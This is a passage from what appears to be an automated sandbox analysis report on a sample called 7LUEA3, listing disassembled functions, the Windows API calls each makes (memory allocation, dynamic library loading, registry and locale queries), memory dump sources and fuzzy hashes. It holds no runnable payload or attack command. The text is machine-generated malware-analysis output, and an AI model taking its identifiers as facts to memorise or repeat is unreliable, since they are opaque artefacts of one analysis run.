                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 01559C82
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 01559D21
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 01559D85
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 01559D9C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocLibraryLoadVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 857568384-0
                                                                                                                                                                                                                                • Opcode ID: afc52d1aa0849d798dcf7ece866e647302e6d30482acdefcdbbfc9b21919dd7d
                                                                                                                                                                                                                                • Instruction ID: f8559782ba163ec99f0a28190fb32826b558ddcce1605201f028a626fb240a3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afc52d1aa0849d798dcf7ece866e647302e6d30482acdefcdbbfc9b21919dd7d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D81DF71A00229DFDBA1CF28CC81BD9B7F5FF59314F0486E5E948AB211D674AE909F90
                                                                                                                                                                                                                                Function 01544AED Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 01544B19
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1705453755-0
                                                                                                                                                                                                                                • Opcode ID: 620b111fba1cdfa382be93e69c92506cfab560708369ee422109dabeaca52b7d
                                                                                                                                                                                                                                • Instruction ID: 0c55f65fe90d665752b1bd47a01853ae26d6e015a48ffdc42a503b3b19eaa93b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 620b111fba1cdfa382be93e69c92506cfab560708369ee422109dabeaca52b7d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1511B1B1E0050AAFDB44CF99C8819EFF7FDFF8C304B148166A519E7250E631AA41CBA0
                                                                                                                                                                                                                                Function 01548245 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,01549841,00000000,01549859), ref: 01548253
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                                                                                                • Opcode ID: 2dc89a07307725275103cf200c5c69cfa7c6b6976a112041bcc6f50f64899b9b
                                                                                                                                                                                                                                • Instruction ID: 32f94db2aa0c5c85059ceb9cc735b2920f72563b345a55efee7b9225e23567b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dc89a07307725275103cf200c5c69cfa7c6b6976a112041bcc6f50f64899b9b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F0DAF86187029FD360DF68D490A1A77E0BF88315F414A6AE9B9CF3C4E734D8089B16
                                                                                                                                                                                                                                Function 09CA9AE8 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000003.1628598878.0000000009C3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 09C3C000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_3_9c3c000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: db58838bb9422c709bc57ba7a8041c48570b11fe7f679b15dccd5151dba945a5
                                                                                                                                                                                                                                • Instruction ID: 8fd73e2fc7b54ebda5166104b1d2addbd3573da2b431e4d6a2e519d050911665
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db58838bb9422c709bc57ba7a8041c48570b11fe7f679b15dccd5151dba945a5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04C04CB4D1E3625EE751CB18954575A7ED09B84348F84C49EB14942254C3B48B809725
                                                                                                                                                                                                                                Function 01549D65 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 01549D6E
                                                                                                                                                                                                                                  • Part of subcall function 01549D2D: GetProcAddress.KERNEL32(00000000), ref: 01549D4B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                • Opcode ID: c71593c4d5ddb80868d1de9e3aa786b778be9378bba252d06a62e818b58ecc6f
                                                                                                                                                                                                                                • Instruction ID: 61088bd0378b70b78fd18cbe14964965d293a50d8b7c8e5ffa11822ddc7289a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c71593c4d5ddb80868d1de9e3aa786b778be9378bba252d06a62e818b58ecc6f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47414DB164434A6B53186BAE7403827B3DDF78C71C361681AB5798F788DE30BD805BB9
                                                                                                                                                                                                                                Function 015558A1 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 015558A7
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 015558B8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 015558C8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 015558D8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 015558E8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 015558F8
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 01555908
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                • Opcode ID: bcb8c669843a44bc883d2aec01bc2e5961ee60de155e8370098480ca7d194452
                                                                                                                                                                                                                                • Instruction ID: 129a098f52ce8d95f633431f53cb6f095a27843106db1405f41b45b131e10769
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcb8c669843a44bc883d2aec01bc2e5961ee60de155e8370098480ca7d194452
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF01CB06603237BD7D06FB25CF9C6E2A7DF5926E4301162F69155D125FBB98804DB20
                                                                                                                                                                                                                                Function 01548A65 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000000,01548D30,?,?,00000000,00000000), ref: 01548A9B
                                                                                                                                                                                                                                  • Part of subcall function 01547269: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 01547287
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                                • Opcode ID: b6bf424bc159ab31cd65830b7b1bc2db7c06b1f3b0376afb06d427b0b683b7c4
                                                                                                                                                                                                                                • Instruction ID: 8191b36f34ae33864e267edf90c54bc4ffd38db7d464231af94593d911866c13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6bf424bc159ab31cd65830b7b1bc2db7c06b1f3b0376afb06d427b0b683b7c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD615D3470524B9BDB00EBE9D854BDE77BAFBE8308F108836B541AF349DA38D9099750
                                                                                                                                                                                                                                Function 0154AF69 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0154B002
                                                                                                                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0154B01E
                                                                                                                                                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0154B057
                                                                                                                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0154B0E3
                                                                                                                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0154B102
                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?), ref: 0154B137
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 351091851-3916222277
                                                                                                                                                                                                                                • Opcode ID: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
                                                                                                                                                                                                                                • Instruction ID: 319db4794b8acc8342d75f96f8c5276269a6cef2fe8ceee8d6aa3b95c1c62a40
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5151EB75A4121E9FCB66DB58CC80BD9B3FDBF5C208F0045D9E619AB211D630AF818F60
                                                                                                                                                                                                                                Function 01540C19 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3,?,?,?,?,?,?,?,01540D8F,0153F924), ref: 01540C52
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3,?,?,?,?,?,?,?,01540D8F), ref: 01540C58
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,01540CA1,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3), ref: 01540C6D
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,01540CA1,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,01540CE3), ref: 01540C73
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 01540C91
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                                • Opcode ID: 22e1884b10bb966923361361e4a937ed1363b05eed008381169902963d69c6a7
                                                                                                                                                                                                                                • Instruction ID: 0419711999d25f6d4fef51485ceca758cb8c975b967d6686f7a9fe9d56378517
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22e1884b10bb966923361361e4a937ed1363b05eed008381169902963d69c6a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0CDB0644342BEEB30A2A49C1AF9EA39CB7D0B14FA0020AB3645F0C5D2F084C4B322
                                                                                                                                                                                                                                Function 0154796D Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: VirtualQuery.KERNEL32(?,?,0000001C), ref: 015477F1
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 01547815
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 01547830
                                                                                                                                                                                                                                  • Part of subcall function 015477D5: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 015478D4
                                                                                                                                                                                                                                • CharToOemA.USER32(?,?), ref: 015479A4
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 015479C1
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 015479C7
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,01547A31,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 015479DC
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,01547A31,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 015479E2
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 01547A04
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 01547A1A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 185507032-0
                                                                                                                                                                                                                                • Opcode ID: d9c2b9ec6d1e5fb6a7f6e7327ffd92a40078a839138afe335ff5d9254745d252
                                                                                                                                                                                                                                • Instruction ID: 25788fd00807a751768e54bfe4cc29508a756be81c8242a0c39e2ef327d32bfe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9c2b9ec6d1e5fb6a7f6e7327ffd92a40078a839138afe335ff5d9254745d252
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D114CB6144317ABD210E6A4CC45F9B77ECBB94604F400626B354EE0E0EB70D9048B62
                                                                                                                                                                                                                                Function 0153EA45 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0155C445), ref: 0153EA74
                                                                                                                                                                                                                                • LocalFree.KERNEL32(014EA240,00000000,0153EB39), ref: 0153EA86
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,014EA240,00000000,0153EB39), ref: 0153EAAA
                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00008000,014EA240,00000000,0153EB39), ref: 0153EAFB
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0155C445), ref: 0153EB29
                                                                                                                                                                                                                                • RtlDeleteCriticalSection.NTDLL(0155C445), ref: 0153EB33
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3782394904-0
                                                                                                                                                                                                                                • Opcode ID: 8c300a387e0940b37f75ac242dfd69fc71e88d2c91c55652e31ad39deca8b45d
                                                                                                                                                                                                                                • Instruction ID: c09b4335732f69efa26d13cc6a222f5ac365bd995822b9cf8497462a89b3c038
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c300a387e0940b37f75ac242dfd69fc71e88d2c91c55652e31ad39deca8b45d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7218174904345EFDB51DBA8E866FA87FE8FB89301F110496E5109F384D6B46944DB11
                                                                                                                                                                                                                                Function 01542CD2 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 01540119: GetKeyboardType.USER32(00000000), ref: 0154011E
                                                                                                                                                                                                                                  • Part of subcall function 01540119: GetKeyboardType.USER32(00000001), ref: 0154012A
                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 01542D38
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 01542D4C
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 01542D5D
                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 01542D99
                                                                                                                                                                                                                                  • Part of subcall function 01540149: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154016B
                                                                                                                                                                                                                                  • Part of subcall function 01540149: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154019E
                                                                                                                                                                                                                                  • Part of subcall function 01540149: RegCloseKey.ADVAPI32(?,015401C1,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 015401B4
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32 ref: 01542D79
                                                                                                                                                                                                                                  • Part of subcall function 01542C09: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,01542C6F), ref: 01542C2F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3734044017-0
                                                                                                                                                                                                                                • Opcode ID: 381e065e6fde71399f39703ed0a28389d24e9977e4238bbdd4398ebd531915a7
                                                                                                                                                                                                                                • Instruction ID: c5551eed3e2b0bdba905df3f0da5f04022a441b5fd94f6c8e78dd9921fd5df8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 381e065e6fde71399f39703ed0a28389d24e9977e4238bbdd4398ebd531915a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F015EB44443538FD720BFF4E42A3583BE6BBE0308F190819E2A04F289D6794059B76A
                                                                                                                                                                                                                                Function 01540149 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154016B
                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0154019E
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,015401C1,00000000,?,00000004,00000000,015401BA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 015401B4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                                • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                                • Opcode ID: 7eec1e1e99d795c0b0be94f45e3f47c19c317cdf70d676e8063a34f110004024
                                                                                                                                                                                                                                • Instruction ID: 6119be5253db6688aaf32723b9970c26369bf63aabe8972a6155d115f5730286
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eec1e1e99d795c0b0be94f45e3f47c19c317cdf70d676e8063a34f110004024
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2801B575640309BEDB11DB90CC42FEDB7BCF744714F200165BA14DB580E6B49510D754
                                                                                                                                                                                                                                Function 015474F1 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,01547588,?,?,00000000), ref: 01547509
                                                                                                                                                                                                                                  • Part of subcall function 01547269: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 01547287
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,01547588,?,?,00000000), ref: 01547539
                                                                                                                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000C43D,00000000,00000000,00000004), ref: 01547544
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,01547588,?,?,00000000), ref: 01547562
                                                                                                                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000C479,00000000,00000000,00000003), ref: 0154756D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4102113445-0
                                                                                                                                                                                                                                • Opcode ID: 33cb5045ee57effc72adce7204b1e353fd3fccd918420f9200369d7de67a4f4b
                                                                                                                                                                                                                                • Instruction ID: b88ea70fa0d4c67a143bf5d7a4535471b4b17251f881aeb2f32057d4da7e57a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33cb5045ee57effc72adce7204b1e353fd3fccd918420f9200369d7de67a4f4b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E0126312042577BE712AAB4DC12FAA769CFB9D71CFA10664F514DE7C0DB34AE0045A0
                                                                                                                                                                                                                                Function 015475A1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,0154776B,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 015475D0
                                                                                                                                                                                                                                  • Part of subcall function 01547269: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 01547287
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                                • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                                • Opcode ID: db83da15a3fa34b45cd54209b620a0defb6d77cf2236c2f5f2df05e05bb2e96a
                                                                                                                                                                                                                                • Instruction ID: 4290fd8cf8135f21b4d20b519fac9d56014b0684996ed953bd14e30a2065919e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db83da15a3fa34b45cd54209b620a0defb6d77cf2236c2f5f2df05e05bb2e96a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E041B1353045074B9B11EABC88903BEB7EAFBDC10CBA44C25D596CF345EB34E9069261
                                                                                                                                                                                                                                Function 01557945 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,01558380,0000001C,?,015579C5,0000001C), ref: 01557964
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 01557971
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: VirtualQueryEx$kernel32.dll
